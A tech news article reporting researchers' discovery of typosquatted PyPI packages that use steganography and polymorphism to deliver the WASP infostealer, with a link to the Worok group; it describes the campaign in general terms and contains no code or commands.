This infostealer has a vicious sting for Python developers

Petya nagscreen
(Image credit: Wikipedia)

Cybersecurity researchers from Checkmarx have discovered more than two dozen malicious packages on PyPI, a popular repository for Python developers, and released their findings in a new report

These malicious packages, designed to look almost identical to legitimate ones, try to trick reckless developers into downloading and installing the wrong one, thus distributing malware. 

The practice is known as typosquatting and it’s quite popular among cybercriminals that attack software developers.

Infostealer thefts

To hide the malware, the attackers are using two unique approaches: steganography, and polymorphism. 

Steganography is the practice of hiding code inside an image, which allows threat actors to distribute malicious code through seemingly innocent .JPGs and .PNGs. 

Polymorphic malware, on the other hand, changes the payload with every install, thus successfully avoiding antivirus programs and other cybersecurity solutions.

Here, the attackers used these techniques to deliver WASP, an infostealer capable of grabbing people’s Discord accounts, passwords, cryptocurrency wallet information, credit card data, as well as any other information on the victim’s endpoint deems interesting. 

Once identified, the data is sent back to the attackers via a hard-coded Discord webhook address. 

The campaign seems to be a marketing stunt, as apparently the researchers spotted the threat actors advertising the tool on the dark web for $20 and claiming that it's undetectable. 

Furthermore, the researchers believe this to be the same group that was behind a similar attack that was first reported earlier this month by researchers at Phylum and Check Point. Back then, it was said that a group dubbed Worok was distributing DropBoxControl, a custom .NET C# infostealer that abuses Dropbox file hosting for communication and data theft, since at least September 2022. 

Given its toolkit, the researchers believe Worok to be the work of a cyberespionage group that works quietly, likes to move laterally across target networks, and steal sensitive data. It also seems to be using its own, proprietary tools, as the researchers haven’t observed them being used by anyone else. 

Via: The Register

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
The Python banner logo on a computer screen running a code editor.
More malicious Python packages are on the loose, experts warn
A white padlock on a dark digital background.
Developers targeted by malicious Microsoft VSCode extensions
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Huge cybercrime attack sees 390,000 WordPress websites hit, details stolen
An abstract image of digital security.
Hundreds of GitHub repositories hijacked to trick users into downloading malware
A digital representation of a lock
Security experts are being targeted with fake malware discoveries
North Korean flag with a hooded hacker
North Korean hackers are posing as software development recruiters to target freelancers
Latest in Security
Data Breach
Thousands of healthcare records exposed online, including private patient information
China
Juniper patches security flaws which could have let hackers take over your router
Representational image depecting cybersecurity protection
GitLab has patched a host of worrying security issues
Ai tech, businessman show virtual graphic Global Internet connect Chatgpt Chat with AI, Artificial Intelligence.
AI agents can be hijacked to write and send phishing attacks
China
Volt Typhoon threat group had access to American utility networks for the best part of a year
Abstract image of cyber security in action.
MassJacker malware targets those looking for pirated software
Latest in News
Brad Pitt looks over his right shoulder with 'F1' written behind him
Apple Original Films will take you behind-the-scenes of a racing cockpit in this new thrilling F1 movie trailer
AI writer
Coding AI tells developer to write it himself
Reacher looking down at another character from the Prime Video TV series Reacher
Reacher season 3 becomes Prime Video’s biggest returning show thanks to Hollywood’s biggest heavyweight
Image showing detail of the Leica D-Lux 8
Still can't get a Fujifilm X100VI? This premium Leica compact costs less, and it's in stock
Man using iMessage on an iPhone
Apple will finally enable encrypted RCS messages between iOS and Android, and it's about time
Google Messages update
Google Messages could soon follow WhatsApp with an upgrade that makes it much easier to join group chats